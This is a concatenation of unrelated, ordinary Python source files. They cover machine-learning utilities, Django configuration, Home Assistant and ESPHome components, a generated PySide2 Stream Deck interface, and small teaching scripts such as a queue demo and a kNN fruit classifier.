loss_function (str, optional): The loss to be optimized. Can be {{"mse","nll","cross-entropy"}}. Defaults to "mse"
loss_type (str, optional): The way the loss is interpreted which influences the interpretation of the l_reg parameter. Can be {{"upper", "exact"}}. Defaults to "upper".
l_reg (float, optional): The regularizer. If loss_type = "upper" is set then l_reg should be [0,1], where 0 indicates independent refinement of the trees and 1 the joint optimization of all trees. A value in-between is a mix of both approaches. If loss_type = "exact" you can freely choose l_reg, where l_reg < 0 actively discourages diversity across the trees, l_reg = 0 ignores it and l_reg > 1 promotes it. Defaults to 1.0
Returns:
Ensemble of Trees or Tree: The refined ensemble / tree
"""
assert (X is not None and Y is not None) or file.endswith(".csv"), "You can either supply (X,y) directly or use `file' to supply a csv file that contains the data. You did not provide either. Please do so."
assert isinstance(model, (Tree.Tree, Ensemble.Ensemble)), "Leaf refinement does only work with Tree Ensembles or single trees, but you provided {}".format(model.__class__.__name__)
assert lr >= 0, "Learning rate must be positive, but you gave {}".format(lr)
assert epochs >= 1, "Number of epochs must be >= 1, but you gave {}".format(epochs)
assert optimizer in ["sgd", "adam"], "The optimizer must be from {{adam, sgd}}, but you gave {}".format(optimizer)
assert loss_function in ["mse", "nll", "cross-entropy"], "Leaf-Refinement-Pytorch only supports the {{mse, nll, cross-entropy}} loss but you gave {}".format(loss_function)
if loss_type == "exact":
assert 0 <= l_reg <= 1, "You set loss_type to exact. In this case l_reg should be from [0,1], but you supplied l_reg = {}".format(l_reg)
if X is None or Y is None:
df = pd.read_csv(file)
df = df.dropna()
Y = df.pop("y")
df = pd.get_dummies(df)
X = df.values
if batch_size > X.shape[0]:
print("Warning: batch_size is greater than supplied number of datapoints. {} > {}. Setting batch_size = {}".format(batch_size,X.shape[0], X.shape[0]))
batch_size = X.shape[0]
leaf_refinery = LeafRefinery(epochs, lr, batch_size, optimizer, verbose, loss_function, loss_type, l_reg)
if isinstance(model, Tree.Tree):
model = leaf_refinery.refine([1.0], [model], X, Y)[0]
else:
model.models = leaf_refinery.refine(model.weights, model.models, X, Y)
return model
|
from pathlib import Path
import sys
from django.conf import settings
BASE_DIR = Path(__file__).resolve().parent.parent
def pytest_configure():
# Add example app to sys path.
parent_dir = Path(__file__).parent
sys.path.append(parent_dir.as_posix())
settings.configure(
INSTALLED_APPS=[
"app",
"django_oso",
"django.contrib.auth",
"django.contrib.contenttypes",
],
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
},
AUTH_USER_MODEL="app.User",
)
|
from queue import Queue
heros = Queue()
heros.put('Iron Man')
heros.put('Captain America')
heros.put('Spider Man')
heros.put('Doctor Strange')
print(heros)
print(heros.get())
print(heros.get())
print(heros)
# Once all the items have been removed from the Queue, a further call to the
# get method does not raise a "queue exhausted / empty" error -- it simply
# blocks forever waiting for a new item, which is one drawback of this
# approach. get_nowait() does not wait at all: it returns an item immediately
# if one is available and raises queue.Empty otherwise, as the last two calls
# below will.
print(heros.get_nowait())
print(heros.get_nowait())
print(heros.get_nowait())
print(heros.get_nowait()) |
import voluptuous as vol
from esphome.components import binary_sensor, sensor
from esphome.components.apds9960 import APDS9960, CONF_APDS9960_ID
import esphome.config_validation as cv
from esphome.const import CONF_DIRECTION, CONF_NAME
from esphome.cpp_generator import get_variable
DEPENDENCIES = ['apds9960']
APDS9960GestureDirectionBinarySensor = sensor.sensor_ns.class_(
'APDS9960GestureDirectionBinarySensor', binary_sensor.BinarySensor)
DIRECTIONS = {
'UP': 'make_up_direction',
'DOWN': 'make_down_direction',
'LEFT': 'make_left_direction',
'RIGHT': 'make_right_direction',
}
PLATFORM_SCHEMA = cv.nameable(binary_sensor.BINARY_SENSOR_PLATFORM_SCHEMA.extend({
cv.GenerateID(): cv.declare_variable_id(APDS9960GestureDirectionBinarySensor),
vol.Required(CONF_DIRECTION): cv.one_of(*DIRECTIONS, upper=True),
cv.GenerateID(CONF_APDS9960_ID): cv.use_variable_id(APDS9960)
}))
def to_code(config):
for hub in get_variable(config[CONF_APDS9960_ID]):
yield
func = getattr(hub, DIRECTIONS[config[CONF_DIRECTION]])
rhs = func(config[CONF_NAME])
binary_sensor.register_binary_sensor(rhs, config)
|
"""Version nummber for network_importer."""
__version_info__ = (2, 0, "0-beta2")
__version__ = ".".join([str(v) for v in __version_info__])
|
"""System plugin for Home Assistant CLI (hass-cli)."""
import logging
import click
from homeassistant_cli.cli import pass_context
import homeassistant_cli.remote as api
_LOGGING = logging.getLogger(__name__)
@click.group('system')
@pass_context
def cli(ctx):
"""System details and operations for Home Assistant."""
@cli.command()
@pass_context
def log(ctx):
"""Get errors from Home Assistant."""
click.echo(api.get_raw_error_log(ctx))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 22 01:38:22 2021
@author: buzun
"""
import keyboard
import uuid
import time
from PIL import Image
from mss import mss
import os
import glob
"""
game address
http://www.trex-game.skipser.com/
"""
# game map
limits = {"top":375, "left": 740, "width":250, "height": 100 }
# mss grabs (cuts out) the region-of-interest frame from the screen
sct = mss()
if os.path.exists("./img"):
files = glob.glob('./img/*')
for f in files:
os.remove(f)
else:
os.makedirs("./img")
i = 0
def recordScreen(recordID, key):
global i
i += 1
print("{}: {}".format(key, i))
img = sct.grab(limits)
im = Image.frombytes("RGB", img.size, img.rgb)
im.save("./img/{}_{}_{}.png".format(key, recordID, i))
isExit = False
def exit():
global isExit
isExit = True
keyboard.add_hotkey("esc", exit)
recordID = uuid.uuid4()
while True:
if isExit: break
try:
if keyboard.is_pressed(keyboard.KEY_UP):
recordScreen(recordID, "up")
time.sleep(0.3)
elif keyboard.is_pressed(keyboard.KEY_DOWN):
recordScreen(recordID, "down")
time.sleep(0.3)
elif keyboard.is_pressed("right"):
recordScreen(recordID, "right")
time.sleep(0.3)
except RuntimeError: continue
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 21 20:08:00 2018
@author: sampr
"""
import pandas as pd
def predict(value) :
data = pd.read_table("fruit_data_set.txt")
k = int(input("\nEnter the value of n_neighbours : "))
X = data['mass']
Y = data['fruit_name']
cache = []
uniqueList = []
for i in X:
absval = abs(value-i)
cache.append(absval)
for i in range(k):  # collect the k nearest neighbours (range(1,k) would only give k-1)
mval = cache.index(min(cache))
maxval = max(cache)
cache[mval] = maxval
tempX = X[mval]
num = X.index[X == tempX]
for j in num:
uniqueList.append(Y[j])
uset = set(uniqueList)
ulist = list(uset)
print(uset)
number = []
for item in uset:
number.append(uniqueList.count(item))
max_index = number.index(max(number))
print(number)
print("The Predicted fruit : " + ulist[max_index])
def main() :
x = int(input("Enter a value to predict : "))
predict(x)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'main.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from . import resources_rc
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
if not MainWindow.objectName():
MainWindow.setObjectName(u"MainWindow")
MainWindow.resize(901, 489)
self.actionDelete = QAction(MainWindow)
self.actionDelete.setObjectName(u"actionDelete")
self.actionCut = QAction(MainWindow)
self.actionCut.setObjectName(u"actionCut")
self.actionCopy = QAction(MainWindow)
self.actionCopy.setObjectName(u"actionCopy")
self.actionPaste = QAction(MainWindow)
self.actionPaste.setObjectName(u"actionPaste")
self.actionMultiPaste = QAction(MainWindow)
self.actionMultiPaste.setObjectName(u"actionMultiPaste")
self.actionImport = QAction(MainWindow)
self.actionImport.setObjectName(u"actionImport")
self.actionExport = QAction(MainWindow)
self.actionExport.setObjectName(u"actionExport")
self.actionExit = QAction(MainWindow)
self.actionExit.setObjectName(u"actionExit")
self.centralwidget = QWidget(MainWindow)
self.centralwidget.setObjectName(u"centralwidget")
self.centralwidget.setAutoFillBackground(False)
self.verticalLayout_2 = QVBoxLayout(self.centralwidget)
self.verticalLayout_2.setSpacing(6)
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.verticalLayout_2.setContentsMargins(9, -1, -1, 3)
self.main_horizontalLayout = QHBoxLayout()
self.main_horizontalLayout.setSpacing(12)
self.main_horizontalLayout.setObjectName(u"main_horizontalLayout")
self.main_horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.left_verticalLayout = QVBoxLayout()
self.left_verticalLayout.setSpacing(6)
self.left_verticalLayout.setObjectName(u"left_verticalLayout")
self.left_verticalLayout.setSizeConstraint(QLayout.SetDefaultConstraint)
self.left_verticalLayout.setContentsMargins(-1, 0, -1, -1)
self.deviceSettings_horizontalLayout = QHBoxLayout()
self.deviceSettings_horizontalLayout.setObjectName(u"deviceSettings_horizontalLayout")
self.deviceSettings_horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.device_list = QComboBox(self.centralwidget)
self.device_list.setObjectName(u"device_list")
self.device_list.setMinimumSize(QSize(400, 0))
self.deviceSettings_horizontalLayout.addWidget(self.device_list)
self.settingsButton = QPushButton(self.centralwidget)
self.settingsButton.setObjectName(u"settingsButton")
sizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.settingsButton.sizePolicy().hasHeightForWidth())
self.settingsButton.setSizePolicy(sizePolicy)
self.settingsButton.setMinimumSize(QSize(0, 0))
self.settingsButton.setMaximumSize(QSize(30, 16777215))
icon = QIcon()
icon.addFile(u":/icons/icons/gear.png", QSize(), QIcon.Normal, QIcon.Off)
self.settingsButton.setIcon(icon)
self.deviceSettings_horizontalLayout.addWidget(self.settingsButton)
self.left_verticalLayout.addLayout(self.deviceSettings_horizontalLayout)
self.pages = QTabWidget(self.centralwidget)
self.pages.setObjectName(u"pages")
sizePolicy1 = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.pages.sizePolicy().hasHeightForWidth())
self.pages.setSizePolicy(sizePolicy1)
self.pages.setAutoFillBackground(False)
self.pages.setStyleSheet(u"b")
self.page_1 = QWidget()
self.page_1.setObjectName(u"page_1")
self.gridLayout_2 = QGridLayout(self.page_1)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.pages.addTab(self.page_1, "")
self.page_2 = QWidget()
self.page_2.setObjectName(u"page_2")
self.gridLayout_3 = QGridLayout(self.page_2)
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.pages.addTab(self.page_2, "")
self.page_3 = QWidget()
self.page_3.setObjectName(u"page_3")
self.gridLayout_11 = QGridLayout(self.page_3)
self.gridLayout_11.setObjectName(u"gridLayout_11")
self.pages.addTab(self.page_3, "")
self.page_4 = QWidget()
self.page_4.setObjectName(u"page_4")
self.gridLayout_10 = QGridLayout(self.page_4)
self.gridLayout_10.setObjectName(u"gridLayout_10")
self.pages.addTab(self.page_4, "")
self.page_5 = QWidget()
self.page_5.setObjectName(u"page_5")
self.gridLayout_9 = QGridLayout(self.page_5)
self.gridLayout_9.setObjectName(u"gridLayout_9")
self.pages.addTab(self.page_5, "")
self.page_6 = QWidget()
self.page_6.setObjectName(u"page_6")
self.gridLayout_8 = QGridLayout(self.page_6)
self.gridLayout_8.setObjectName(u"gridLayout_8")
self.pages.addTab(self.page_6, "")
self.page_7 = QWidget()
self.page_7.setObjectName(u"page_7")
self.gridLayout_7 = QGridLayout(self.page_7)
self.gridLayout_7.setObjectName(u"gridLayout_7")
self.pages.addTab(self.page_7, "")
self.page_8 = QWidget()
self.page_8.setObjectName(u"page_8")
self.gridLayout_6 = QGridLayout(self.page_8)
self.gridLayout_6.setObjectName(u"gridLayout_6")
self.pages.addTab(self.page_8, "")
self.page_9 = QWidget()
self.page_9.setObjectName(u"page_9")
self.gridLayout_5 = QGridLayout(self.page_9)
self.gridLayout_5.setObjectName(u"gridLayout_5")
self.pages.addTab(self.page_9, "")
self.tab_10 = QWidget()
self.tab_10.setObjectName(u"tab_10")
self.gridLayout_4 = QGridLayout(self.tab_10)
self.gridLayout_4.setObjectName(u"gridLayout_4")
self.pages.addTab(self.tab_10, "")
self.left_verticalLayout.addWidget(self.pages)
self.left_verticalLayout.setStretch(1, 1)
self.main_horizontalLayout.addLayout(self.left_verticalLayout)
self.right_horizontalLayout = QHBoxLayout()
self.right_horizontalLayout.setObjectName(u"right_horizontalLayout")
self.groupBox = QGroupBox(self.centralwidget)
self.groupBox.setObjectName(u"groupBox")
self.groupBox.setMinimumSize(QSize(250, 0))
self.verticalLayout_3 = QVBoxLayout(self.groupBox)
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.formLayout = QFormLayout()
self.formLayout.setObjectName(u"formLayout")
# Image Button Section
self.label = QLabel(self.groupBox)
self.label.setObjectName(u"label")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.label)
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setSpacing(6)
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.imageButton = QPushButton(self.groupBox)
self.imageButton.setObjectName(u"imageButton")
self.horizontalLayout_2.addWidget(self.imageButton)
self.removeButton = QPushButton(self.groupBox)
self.removeButton.setObjectName(u"removeButton")
sizePolicy2 = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
sizePolicy2.setHorizontalStretch(0)
sizePolicy2.setVerticalStretch(0)
sizePolicy2.setHeightForWidth(self.removeButton.sizePolicy().hasHeightForWidth())
self.removeButton.setSizePolicy(sizePolicy2)
self.removeButton.setMaximumSize(QSize(30, 16777215))
icon1 = QIcon()
icon1.addFile(u":/icons/icons/cross.png", QSize(), QIcon.Normal, QIcon.Off)
self.removeButton.setIcon(icon1)
self.horizontalLayout_2.addWidget(self.removeButton)
self.formLayout.setLayout(0, QFormLayout.FieldRole, self.horizontalLayout_2)
# Text Entry Section
self.label_2 = QLabel(self.groupBox)
self.label_2.setObjectName(u"label_2")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.label_2)
self.text = QLineEdit(self.groupBox)
self.text.setObjectName(u"text")
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.text)
# Text Align
self.textAlign = QLabel(self.groupBox)
self.textAlign.setObjectName(u"text_align_label")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.textAlign)
self.text_Align = QComboBox(self.groupBox)
self.text_Align.setObjectName(u"target_text_align")
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.text_Align)
# font size
self.fontSize = QLabel(self.groupBox)
self.fontSize.setObjectName(u"font_size_label")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.fontSize)
self.font_Size = QSpinBox(self.groupBox)
self.font_Size.setObjectName(u"target_font_size")
self.font_Size.setMinimum(1)
self.font_Size.setMaximum(40)
self.font_Size.setValue(0)
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.font_Size)
# font color
self.fontColor = QLabel(self.groupBox)
self.fontColor.setObjectName(u"font_color_label")
self.formLayout.setWidget(4, QFormLayout.LabelRole, self.fontColor)
self.font_Color = QComboBox(self.groupBox)
self.font_Color.setObjectName(u"target_font_color")
self.formLayout.setWidget(4, QFormLayout.FieldRole, self.font_Color)
# selected font
self.selectedFont = QLabel(self.groupBox)
self.selectedFont.setObjectName(u"selected_font_label")
self.formLayout.setWidget(5, QFormLayout.LabelRole, self.selectedFont)
self.selected_font = QComboBox(self.groupBox)
self.selected_font.setObjectName(u"target_selected_font")
self.formLayout.setWidget(5, QFormLayout.FieldRole, self.selected_font)
self.label_3 = QLabel(self.groupBox)
self.label_3.setObjectName(u"label_3")
self.formLayout.setWidget(6, QFormLayout.LabelRole, self.label_3)
self.command = QLineEdit(self.groupBox)
self.command.setObjectName(u"command")
self.formLayout.setWidget(6, QFormLayout.FieldRole, self.command)
self.label_5 = QLabel(self.groupBox)
self.label_5.setObjectName(u"label_5")
self.formLayout.setWidget(7, QFormLayout.LabelRole, self.label_5)
self.keys = QLineEdit(self.groupBox)
self.keys.setObjectName(u"keys")
self.formLayout.setWidget(7, QFormLayout.FieldRole, self.keys)
# switch page
self.label_8 = QLabel(self.groupBox)
self.label_8.setObjectName(u"label_8")
self.formLayout.setWidget(8, QFormLayout.LabelRole, self.label_8)
self.switch_page = QSpinBox(self.groupBox)
self.switch_page.setObjectName(u"switch_page")
self.switch_page.setMinimum(0)
self.switch_page.setMaximum(10)
self.switch_page.setValue(0)
self.formLayout.setWidget(8, QFormLayout.FieldRole, self.switch_page)
# target device
self.targetDevice = QLabel(self.groupBox)
self.targetDevice.setObjectName(u"label_9")
self.formLayout.setWidget(9, QFormLayout.LabelRole, self.targetDevice)
self.target_device = QComboBox(self.groupBox)
self.target_device.setObjectName(u"target_device")
self.formLayout.setWidget(9, QFormLayout.FieldRole, self.target_device)
# change brightness
self.label_7 = QLabel(self.groupBox)
self.label_7.setObjectName(u"label_7")
self.formLayout.setWidget(10, QFormLayout.LabelRole, self.label_7)
self.change_brightness = QSpinBox(self.groupBox)
self.change_brightness.setObjectName(u"change_brightness")
self.change_brightness.setMinimum(-99)
self.formLayout.setWidget(10, QFormLayout.FieldRole, self.change_brightness)
# write text
self.label_6 = QLabel(self.groupBox)
self.label_6.setObjectName(u"label_6")
self.formLayout.setWidget(11, QFormLayout.LabelRole, self.label_6)
self.write = QPlainTextEdit(self.groupBox)
self.write.setObjectName(u"write")
self.formLayout.setWidget(11, QFormLayout.FieldRole, self.write)
self.verticalLayout_3.addLayout(self.formLayout)
self.right_horizontalLayout.addWidget(self.groupBox)
self.main_horizontalLayout.addLayout(self.right_horizontalLayout)
self.verticalLayout_2.addLayout(self.main_horizontalLayout)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QMenuBar(MainWindow)
self.menubar.setObjectName(u"menubar")
self.menubar.setGeometry(QRect(0, 0, 901, 22))
self.menuFile = QMenu(self.menubar)
self.menuFile.setObjectName(u"menuFile")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QStatusBar(MainWindow)
self.statusbar.setObjectName(u"statusbar")
MainWindow.setStatusBar(self.statusbar)
self.menubar.addAction(self.menuFile.menuAction())
self.menuFile.addAction(self.actionImport)
self.menuFile.addAction(self.actionExport)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionExit)
self.menuEdit = QMenu(self.menubar)
self.menuEdit.setObjectName(u"menuEdit")
self.menubar.addAction(self.menuEdit.menuAction())
self.menuEdit.addAction(self.actionCut)
self.menuEdit.addAction(self.actionCopy)
self.menuEdit.addAction(self.actionPaste)
self.menuEdit.addAction(self.actionDelete)
self.menuEdit.addSeparator()
self.menuEdit.addAction(self.actionMultiPaste)
self.retranslateUi(MainWindow)
self.pages.setCurrentIndex(0)
QMetaObject.connectSlotsByName(MainWindow)
# setupUi
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QCoreApplication.translate("MainWindow", u"Stream Deck UI", None))
self.actionImport.setText(QCoreApplication.translate("MainWindow", u"Import", None))
self.actionExport.setText(QCoreApplication.translate("MainWindow", u"Export", None))
self.actionExit.setText(QCoreApplication.translate("MainWindow", u"Exit", None))
self.settingsButton.setText("")
self.pages.setTabText(
self.pages.indexOf(self.page_1),
QCoreApplication.translate("MainWindow", u"Page 1", None),
)
self.pages.setTabText(
self.pages.indexOf(self.page_2), QCoreApplication.translate("MainWindow", u"2", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_3), QCoreApplication.translate("MainWindow", u"3", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_4), QCoreApplication.translate("MainWindow", u"4", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_5), QCoreApplication.translate("MainWindow", u"5", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_6), QCoreApplication.translate("MainWindow", u"6", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_7), QCoreApplication.translate("MainWindow", u"7", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_8), QCoreApplication.translate("MainWindow", u"8", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_9), QCoreApplication.translate("MainWindow", u"9", None)
)
self.pages.setTabText(
self.pages.indexOf(self.tab_10), QCoreApplication.translate("MainWindow", u"10", None)
)
self.groupBox.setTitle(QCoreApplication.translate("MainWindow", u"Configure Button", None))
self.label.setText(QCoreApplication.translate("MainWindow", u"Image:", None))
self.imageButton.setText(QCoreApplication.translate("MainWindow", u"Image...", None))
# if QT_CONFIG(tooltip)
self.removeButton.setToolTip(
QCoreApplication.translate("MainWindow", u"Remove the image from the button", None)
)
# endif // QT_CONFIG(tooltip)
self.removeButton.setText("")
self.label_2.setText(QCoreApplication.translate("MainWindow", u"Text:", None))
self.label_3.setText(QCoreApplication.translate("MainWindow", u"Command:", None))
self.label_5.setText(QCoreApplication.translate("MainWindow", u"Press Keys:", None))
self.label_8.setText(QCoreApplication.translate("MainWindow", u"Switch Page:", None))
self.textAlign.setText(QCoreApplication.translate("MainWindow", u"Text Align:", None))
self.selectedFont.setText(QCoreApplication.translate("MainWindow", u"Select Font:", None))
self.fontSize.setText(QCoreApplication.translate("MainWindow", u"Font Size:", None))
self.fontColor.setText(QCoreApplication.translate("MainWindow", u"Font Color:", None))
self.targetDevice.setText(QCoreApplication.translate("MainWindow", u"Target Device:", None))
self.label_7.setText(QCoreApplication.translate("MainWindow", u"Brightness +/-:", None))
self.label_6.setText(QCoreApplication.translate("MainWindow", u"Write Text:", None))
self.menuFile.setTitle(QCoreApplication.translate("MainWindow", u"File", None))
self.menuEdit.setTitle(QCoreApplication.translate("MainWindow", u"Edit", None))
self.actionDelete.setText(QCoreApplication.translate("MainWindow", u"Delete Button", None))
self.actionCut.setText(QCoreApplication.translate("MainWindow", u"Cut Button", None))
self.actionCopy.setText(QCoreApplication.translate("MainWindow", u"Copy Button", None))
self.actionPaste.setText(QCoreApplication.translate("MainWindow", u"Paste Button", None))
self.actionMultiPaste.setText(
QCoreApplication.translate("MainWindow", u"Multi Paste Disabled", None)
)
# retranslateUi
|
import setuptools
setuptools.setup(
name="explorecourses",
version="2.0.0",
url="https://github.com/danielwe/explore-courses-api",
author="Jeremy Ephron, Daniel Wennberg",
author_email="[email protected], [email protected]",
description="A Python API for Stanford Explore Courses",
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
packages=setuptools.find_packages(),
install_requires=[
'requests>=2'
],
setup_requires=["pytest-runner"],
tests_require=["pytest"],
classifiers=(
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
)
|
__version__ = (2, 2, 1) |
"""pokerscores URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from django.contrib import admin
from django.contrib.auth.models import User
from django.views.generic.base import TemplateView
from django.conf import settings
from django.conf.urls.static import static
from rest_framework import routers, serializers, viewsets
from graphene_django.views import GraphQLView
from django.contrib.auth.views import auth_logout
from api.models import League, Profile
from api.views import UserViewSet, GroupViewSet, LeagueViewSet, ProfileViewSet, EventViewSet, GameViewSet, GamePlayerViewSet
from pokerscores.views import angular_home
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'users', UserViewSet)
router.register(r'groups', GroupViewSet)
router.register(r'leagues', LeagueViewSet)
router.register(r'profile', ProfileViewSet)
router.register(r'events', EventViewSet)
router.register(r'games', GameViewSet)
router.register(r'gameplayers', GamePlayerViewSet)
urlpatterns = static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + \
[
path('', include('social_django.urls', namespace='social')),
# url(r'^', include(router.urls)),
url(r'^views/', include('api.urls')),
url(r'^api/', include(router.urls)),
url(r'^api-doc/', include('rest_framework.urls')),
url(r'^admin/', admin.site.urls),
path('graphql/', csrf_exempt(GraphQLView.as_view(graphiql=True))),
url(r'^.*', angular_home, name='angular_home')
] |
from thesis_util.thesis_util import eval_experiment
from thesis_util.thesis_util import create_eval_recon_imgs,create_eval_random_sample_imgs
# load results for spatial VAE with latent space 3x3x9
# Paths and names
pathes_2_experiments = [r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019',
r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_05_12AM on November 21, 2019',
r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_06_52AM on November 20, 2019',
r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_11_16PM on November 20, 2019']
save_directory = 'C:\\Users\\ga45tis\\GIT\\masterthesisgeneral\\latex\\900 Report\\images\\experiments\\SpatialVAE\\'
model_name = 'SVAE_339'
title=r'$\textrm{SVAE}_{3 \times 3 \times 9}$'
prefix_4include = r"images/experiments/SpatialVAE/"
sample_img_path = r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019\imgs\generated_sample_epoch_300.png'
recon_test_img_path = r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019\imgs\recon_test_epoch_291.png'
recon_train_img_path = r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019\imgs\recon_train_epoch_300.png'
eval_experiment(save_directory=save_directory,model_name=model_name,pathes_2_experiments=pathes_2_experiments,
title=title,sample_img_path=sample_img_path,recon_test_img_path=recon_test_img_path,recon_train_img_path=recon_train_img_path)
# create for test data
title_test = title+ " - Reconstructions of Test Data"
pdf_file_name = 'recon_test_' + model_name
create_eval_recon_imgs(recon_img_path=recon_test_img_path,title=title_test,pdf_file_name=pdf_file_name,save_directory=save_directory,prefix_4include=prefix_4include)
# create for train data
title_train = title + " - Reconstructions of Training Data"
pdf_file_name = 'recon_train_' + model_name
create_eval_recon_imgs(recon_img_path=recon_train_img_path,title=title_train,pdf_file_name=pdf_file_name,save_directory=save_directory,prefix_4include=prefix_4include)
# create random samples image
title_random_samples = title + " - Random Generated Samples"
pdf_file_name = 'random_generated_' + model_name
create_eval_random_sample_imgs(recon_img_path=sample_img_path, title=title_random_samples, pdf_file_name=pdf_file_name, save_directory=save_directory,prefix_4include=prefix_4include) |
import torch
import pytorch_lightning as pl
from pathlib import Path
from typing import List, Optional, Dict, Tuple
from torch.utils.data import DataLoader
from src.utils import FileHandler
from src.dl.utils import to_device
from ..datasets.dataset_builder import DatasetBuilder
class CustomDataModule(pl.LightningDataModule, FileHandler):
def __init__(
self,
train_db_path: str,
test_db_path: str,
augmentations: List[str]=["hue_sat", "non_rigid", "blur"],
normalize: bool=False,
aux_branch: str="hover",
type_branch: bool=True,
sem_branch: bool=False,
rm_touching_nuc_borders: bool=False,
edge_weights: bool=False,
batch_size: int=8,
num_workers: int=8
) -> None:
"""
Sets up a datamodule for the given h5/zarr databases.
The databases need to be written with the writers of this repo.
Args:
---------
train_db_path (str):
Path to the hdf5/zarr train database
test_db_path (str):
Path to the hdf5/zarr test database
augmentations (List[str], default=["hue_sat", "non_rigid", "blur"]):
List of augmentations. Allowed augs: "hue_sat", "rigid",
"non_rigid", "blur", "non_spatial", "normalize"
normalize (bool, default=False):
If True, channel-wise min-max normalization is applied
to input imgs in the dataloading process
aux_branch (str, default="hover"):
Signals that the dataset needs to prepare an input for
an auxiliary branch in the __getitem__ method. One of:
"hover", "dist", "contour", None. If None, assumes that
the network does not contain auxiliary branch and the
unet style dataset (edge weights) is used as the dataset
type_branch (bool, default=True):
If cell type branch is included in the model, this arg
signals that the cell type annotations are included per
each dataset iter. Given that these annotations exist in
db
sem_branch (bool, default=False):
If the model contains a semantic area branch, this arg
signals that the area annotations are included per each
dataset iter. Given that these annotations exist in db
rm_touching_nuc_borders (bool, default=False):
If True, the pixels that are touching between distinct
nuclear objects are removed from the masks.
edge_weights (bool, default=False):
If True, each dataset iteration will create weight maps
for the nuclear edges. This can be used to penalize
nuclei edges in cross-entropy based loss functions.
batch_size (int, default=8):
Batch size for the dataloader
num_workers (int, default=8):
number of cpu cores/threads used in the dataloading
process.
"""
super(CustomDataModule, self).__init__()
self.db_fname_train = Path(train_db_path)
self.db_fname_test = Path(test_db_path)
self.augs = augmentations
self.norm = normalize
self.aux_branch = aux_branch
self.type_branch = type_branch
self.sem_branch = sem_branch
self.edge_weights = edge_weights
self.rm_touching_nuc_borders = rm_touching_nuc_borders
self.batch_size = batch_size
self.num_workers = num_workers
@property
def class_weights(self) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Get the proportion of pixels of different classes in the
train dataset
"""
weights = self.get_class_weights(self.db_fname_train.as_posix())
weights_bin = self.get_class_weights(
self.db_fname_train.as_posix(), binary=True
)
return to_device(weights), to_device(weights_bin)
@property
def class_dicts(self) -> Tuple[Dict[str, int]]:
"""
Get the cell type and possible semantic classes of this dataset.
These should be saved in the db
"""
return self.get_class_dicts(self.db_fname_train.as_posix())
def setup(self, stage: Optional[str] = None) -> None:
self.trainset = DatasetBuilder.set_train_dataset(
fname=self.db_fname_train.as_posix(),
decoder_aux_branch=self.aux_branch,
augmentations=self.augs,
normalize_input=self.norm,
rm_touching_nuc_borders=self.rm_touching_nuc_borders,
edge_weights=self.edge_weights,
type_branch=self.type_branch,
